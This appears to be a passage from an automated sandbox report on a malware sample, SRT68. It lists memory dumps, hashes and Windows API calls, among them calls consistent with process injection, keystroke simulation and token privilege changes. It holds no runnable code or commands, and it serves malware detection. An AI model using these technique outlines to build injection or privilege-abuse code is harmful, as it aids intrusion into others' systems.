                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                      • Instruction ID: 22bb090e561329186ffd7c8843d4cea43d945cecfb77899872be019aae3ff94c
                                                                      • Opcode Fuzzy Hash: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                      • Instruction Fuzzy Hash: 09F09C319106469AD714AB655E03FAD76A16F41775F20410CA454AB1C1CBFC5982BB51
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015B0233
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015B02C9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015B02EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction ID: 40bccd6fc358a3d91908227ed18a70f938e97d6a03a930c22c32be4e37a6169d
                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction Fuzzy Hash: AF12DD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E81CF5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 6abd7baa3376518c1bb51c8f218db881ab1e5133df9dde0999446d1fca7097f1
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 5731B771A00106DBC718DF58C685B69F7A6FB59310B6487A9E80ACB355DB31EDC2EBC0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 72013cb3ddbe6994f613c9364404112600b037732a5595c76eea08d8f48bc073
                                                                      • Instruction ID: 659c5336e7dcaee65d5321fd990584017940599193f5d0807dae4227c3f45fd3
                                                                      • Opcode Fuzzy Hash: 72013cb3ddbe6994f613c9364404112600b037732a5595c76eea08d8f48bc073
                                                                      • Instruction Fuzzy Hash: FE4108B4904341DFDB24DF14C454B1ABBE1BF45314F0988ACE8998B762C775E849DF52
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 1d223ea7b9a449821b5dbf5dd21c44dc6df82723be687205acd3f11b6d15db86
                                                                      • Instruction ID: be453b34dabd13ca210dc4efc35f9e58fd8f696f55e65e4177bf7977e953f207
                                                                      • Opcode Fuzzy Hash: 1d223ea7b9a449821b5dbf5dd21c44dc6df82723be687205acd3f11b6d15db86
                                                                      • Instruction Fuzzy Hash: A12166B2A14709EBCF206F11EC41BAA7BB5FB54390F25842EE486C9284EF319090F715
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f53d4a70f2b8421be27386de0361a86eaf0d547d50f74c03dd7a4a7d5bc5f49c
                                                                      • Instruction ID: 586cbb32e3fef4049e6f3b3a3b1b79a3b12249cc48cc75963bad6cebb1896b89
                                                                      • Opcode Fuzzy Hash: f53d4a70f2b8421be27386de0361a86eaf0d547d50f74c03dd7a4a7d5bc5f49c
                                                                      • Instruction Fuzzy Hash: 2121F376409202EFC311AF24D843AF6B7F4EF82322B11819EED918B862CB3059478F91
                                                                      APIs
                                                                        • Part of subcall function 00FA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FA4BEF
                                                                        • Part of subcall function 00FC525B: __wfsopen.LIBCMT ref: 00FC5266
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
                                                                        • Part of subcall function 00FA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FA4BA4
                                                                        • Part of subcall function 00FA4C70: _memmove.LIBCMT ref: 00FA4CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
                                                                      • Instruction ID: 9f5523c4d58701c9caa53ba3f268e6c49828d5d33bdf65c552e1e6333b5bb635
                                                                      • Opcode Fuzzy Hash: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
                                                                      • Instruction Fuzzy Hash: 9A11E772600206ABCF11FF70CC52FAD77A5AFC5750F10842DF541A7181DAFAA901B760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 1c08726d2d6f7d358875aefb325e56808126f79d5d384746133c36dfb1adbe4f
                                                                      • Instruction ID: ba7f12f455bd979bfe991b1294d35f43cbeec5ef03bcfee66b8163a6f266ae58
                                                                      • Opcode Fuzzy Hash: 1c08726d2d6f7d358875aefb325e56808126f79d5d384746133c36dfb1adbe4f
                                                                      • Instruction Fuzzy Hash: BA2128B4908342DFDB24DF64C444B1ABBE1BF85314F05896CF88957762D735E809EB52
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 00FC48A6
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2597487223-0
                                                                      • Opcode ID: 72d37ac8a1dba33d021e90435bcbc25204ed89934f86894ab6b436411e96c494
                                                                      • Instruction ID: 4193bd760e2fdcf41ae8f61189b265c1af3ac74fc316dfa2a90dad0097fcb0d7
                                                                      • Opcode Fuzzy Hash: 72d37ac8a1dba33d021e90435bcbc25204ed89934f86894ab6b436411e96c494
                                                                      • Instruction Fuzzy Hash: 65F0AF3190160BEBDF11AFA48E07FAE36A0AF10376F15841CB8249A1D1CB7C9952FB51
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 0288db6ac8b28077c2530a5bb096c8be7f4246dfab3942125693659b2a694f3d
                                                                      • Instruction ID: aa7a5c94f1d965d2e59451124a1292d8f2bfebf06224fd647b6883fb6ffc72d6
                                                                      • Opcode Fuzzy Hash: 0288db6ac8b28077c2530a5bb096c8be7f4246dfab3942125693659b2a694f3d
                                                                      • Instruction Fuzzy Hash: D8F039B1901712CFCB349F64E4D4812BBF5BF963793208A3EE1D682610C7B2A880EF40
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: e74a3f2db7de7e65743ccadef0af677b22f30cc14c0baa28b7fada755257f001
                                                                      • Instruction ID: b2e0b5136b76bcfcc9ef7f414eaadf5ac5813d497ae0bf6632417b52ae861629
                                                                      • Opcode Fuzzy Hash: e74a3f2db7de7e65743ccadef0af677b22f30cc14c0baa28b7fada755257f001
                                                                      • Instruction Fuzzy Hash: B7E0867690422857C720A5989C05FEA77ADDB896A0F0441B6FC08D7208D9659C948691
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction ID: 363b54cac752c7292ea1e70bc9b8d1e9f05555b38f198dc4e87b9e4d82140d63
                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction Fuzzy Hash: 2EB0927644020C77CE012A82EC03F897B599B42BA4F408020FB0C18162A677A6A4AA89
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 015B0A89
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 8147f84862864469368dae1e0e7d0bd5a3bdfb4407cb657258e47a366ede4729
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 78E0BF7494010DEFDB00DFA4D5496DE7BB4FF04301F1006A1FD05D7680DB709E548A62
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 015B0A89
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 99eefc07c247396e782cee0f854a18d153fb7afadb29cdae19d0953cb6dfa128
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: 2FE0E67494010DDFDB00DFB4D5496DE7BB4FF04301F100661FD01D2280D7709D508A62
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0102CB37
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CB95
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102CBD6
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CC00
                                                                      • SendMessageW.USER32 ref: 0102CC29
                                                                      • _wcsncpy.LIBCMT ref: 0102CC95
                                                                      • GetKeyState.USER32(00000011), ref: 0102CCB6
                                                                      • GetKeyState.USER32(00000009), ref: 0102CCC3
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CCD9
                                                                      • GetKeyState.USER32(00000010), ref: 0102CCE3
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CD0C
                                                                      • SendMessageW.USER32 ref: 0102CD33
                                                                      • SendMessageW.USER32(?,00001030,?,0102B348), ref: 0102CE37
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0102CE4D
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0102CE60
                                                                      • SetCapture.USER32(?), ref: 0102CE69
                                                                      • ClientToScreen.USER32(?,?), ref: 0102CECE
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0102CEDB
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0102CEF5
                                                                      • ReleaseCapture.USER32 ref: 0102CF00
                                                                      • GetCursorPos.USER32(?), ref: 0102CF3A
                                                                      • ScreenToClient.USER32(?,?), ref: 0102CF47
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102CFA3
                                                                      • SendMessageW.USER32 ref: 0102CFD1
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D00E
                                                                      • SendMessageW.USER32 ref: 0102D03D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0102D05E
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0102D06D
                                                                      • GetCursorPos.USER32(?), ref: 0102D08D
                                                                      • ScreenToClient.USER32(?,?), ref: 0102D09A
                                                                      • GetParent.USER32(?), ref: 0102D0BA
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102D123
                                                                      • SendMessageW.USER32 ref: 0102D154
                                                                      • ClientToScreen.USER32(?,?), ref: 0102D1B2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0102D1E2
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D20C
                                                                      • SendMessageW.USER32 ref: 0102D22F
                                                                      • ClientToScreen.USER32(?,?), ref: 0102D281
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0102D2B5
                                                                        • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102D351
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3977979337-4164748364
                                                                      • Opcode ID: f7bc45082040a00fb99d23a72a430dc53bb3c1c5938545b30aedeb1bdf2e070e
                                                                      • Instruction ID: 48e950545c859bc1963fe4bf84ca187b1b0a1c35bcaa9f720bf38efd7cba2c9c
                                                                      • Opcode Fuzzy Hash: f7bc45082040a00fb99d23a72a430dc53bb3c1c5938545b30aedeb1bdf2e070e
                                                                      • Instruction Fuzzy Hash: D542DC78204291AFE731CF28C948EAABFE5FF49350F140549FAD5872A1C736D844EB92
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_memset
                                                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                      • API String ID: 1357608183-1798697756
                                                                      • Opcode ID: 7c48447fc232a9e774518daca45066d242d01dc67aac5cd4c8daaa4c46625858
                                                                      • Instruction ID: 138e46244e7028bdb29ff0dca188d5a37ef0283affc52ee9ce78dd16fb2153fd
                                                                      • Opcode Fuzzy Hash: 7c48447fc232a9e774518daca45066d242d01dc67aac5cd4c8daaa4c46625858
                                                                      • Instruction Fuzzy Hash: CD93A275E04219DBDB24DF98C881BFDB7B1FF48720F24816ADA45AB290E7749D81EB40
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00FA48DF
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FDD665
                                                                      • IsIconic.USER32(?), ref: 00FDD66E
                                                                      • ShowWindow.USER32(?,00000009), ref: 00FDD67B
                                                                      • SetForegroundWindow.USER32(?), ref: 00FDD685
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FDD69B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FDD6A2
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDD6AE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6BF
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6C7
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FDD6CF
                                                                      • SetForegroundWindow.USER32(?), ref: 00FDD6D2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6E7
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD6F2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6FC
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD701
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD70A
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD70F
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD719
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD71E
                                                                      • SetForegroundWindow.USER32(?), ref: 00FDD721
                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00FDD748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 65a793e76e6e3503d33df1893da860f9af8baa3855ff6d4bde8b3ee9112265fe
                                                                      • Instruction ID: 716a17aa21a04e3d9e0f08bcb161fa7af6068a62e6f61346a88c5365c7d5dccd
                                                                      • Opcode Fuzzy Hash: 65a793e76e6e3503d33df1893da860f9af8baa3855ff6d4bde8b3ee9112265fe
                                                                      • Instruction Fuzzy Hash: 61317271A40318BAEB316F619C49F7F7F7DEB44BA0F244066FA04EA1C1C6B55900ABA0
                                                                      APIs
                                                                        • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                        • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                        • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
                                                                      • _memset.LIBCMT ref: 00FF8353
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FF83A5
                                                                      • CloseHandle.KERNEL32(?), ref: 00FF83B6
